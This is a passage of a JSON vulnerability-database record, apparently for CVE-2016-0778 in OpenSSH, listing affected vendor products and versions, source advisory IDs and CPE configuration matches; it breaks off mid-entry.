"vendor": "ibm", "version": "1.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "junos 12.1x46-d35", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "purepower integrated manager kvm host", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "pan-os", "scope": "ne", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.1.3" }, { "model": "purview", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0" }, { "model": "junos 15.1x49-d40", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11.4" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.17" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.10" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.18" }, { "model": "ids/ips", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.1" }, { "model": "junos 13.3r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7" }, { "model": "junos 15.1x49-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x46-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "nac appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0.3" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "junos 14.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.10" }, { "model": "junos 12.1x46-d45", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.14" }, { "model": "junos 13.3r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 15.1r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "6.2p1", "scope": null, "trust": 0.3, "vendor": "openssh", "version": null }, { "model": "junos 12.1x47-d11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "purepower integrated manager vhmc appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0" }, { "model": "junos 15.1x49-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.0.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "junos 15.1f3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.1.2" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.8" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.8" }, { "model": "netsight appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3.0.179" }, { "model": "extremexos patch", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.38" }, { "model": "junos 15.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 15.1f2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "junos 12.3r11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.5" }, { "model": "junos 15.1x49-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.4" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.6" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.2" }, { "model": "junos 14.1r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.70" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.7" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "5.6p1", "scope": null, "trust": 0.3, "vendor": "openssh", "version": null }, { "model": "nsm4000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "junos 13.3r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x47-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.0" }, { "model": "junos 14.1r7", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 14.1r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "virtual customer access system", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "14.06" }, { "model": "junos 12.1x46-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.2" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.15" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "junos 12.1x47-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nac appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3.0.179" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.4" }, { "model": "opensuse evergreen", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11.4" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.8" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "junos 14.1r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "15.10" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "virtual customer access system", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "15.07" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "identifi wireless", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "10.11" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "7.1p2", "scope": "ne", "trust": 0.3, "vendor": "openssh", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.4" }, { "model": "junos 12.3x48-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.3x48-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "extremexos patch", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.31" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.13" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.5" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "mac os security update", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x2016-0020" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.8" }, { "model": "junos 14.2r6", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.3" }, { "model": "junos 12.3x48-d30", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "4.4" }, { "model": "junos 12.1x47-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "junos 12.3r12", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "purepower integrated manager appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "flex system chassis management module 2pet", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.7" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.2" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.6" }, { "model": "junos 15.1f1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.1.2" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.12" }, { "model": "junos 13.3r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "junos 12.1x46-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "16.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.3" }, { "model": "junos 13.3r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.3" }, { "model": "junos 13.3r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x46-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "6.2p2", "scope": null, "trust": 0.3, "vendor": "openssh", "version": null }, { "model": "junos 12.3x48-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "7.1" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "purview", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "0" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.3" }, { "model": "junos 12.1x46-d36", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "purview", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "junos 14.2r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.6" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "junos 15.1r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.1" }, { "model": "junos 12.1x46-d40", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.1.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.2" }, { "model": "junos 15.1x49-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "virtual customer access system", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "16.05" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "junos 13.3r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "remote device access", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.9" }, { "model": "junos 14.2r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 14.2r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.4" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.00" }, { "model": "remote device access", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8.7" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "junos 15.1f5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 13.3r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 14.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "junos 12.1x46-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.6" }, { "model": "smartcloud provisioning for software virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "junos 12.1x47-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "junos 14.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.1" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "junos 12.1x47-d35", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.4" }, { "model": "junos 12.3x48-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x46-d26", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "identifi wireless", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "10.11.1" }, { "model": "p2", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.8" }, { "model": "netsight appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "purepower integrated manager power vc appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "junos 12.3r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.5" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "7.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "15.04" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.10" }, { "model": "junos 14.1r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.5" }, { "model": "6.9p1", "scope": null, "trust": 0.3, "vendor": "openssh", "version": null } ], "sources": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "BID", "id": "80698" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.4:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.7:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.5:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.0:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.6:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.9:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.6:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.1:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.5:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 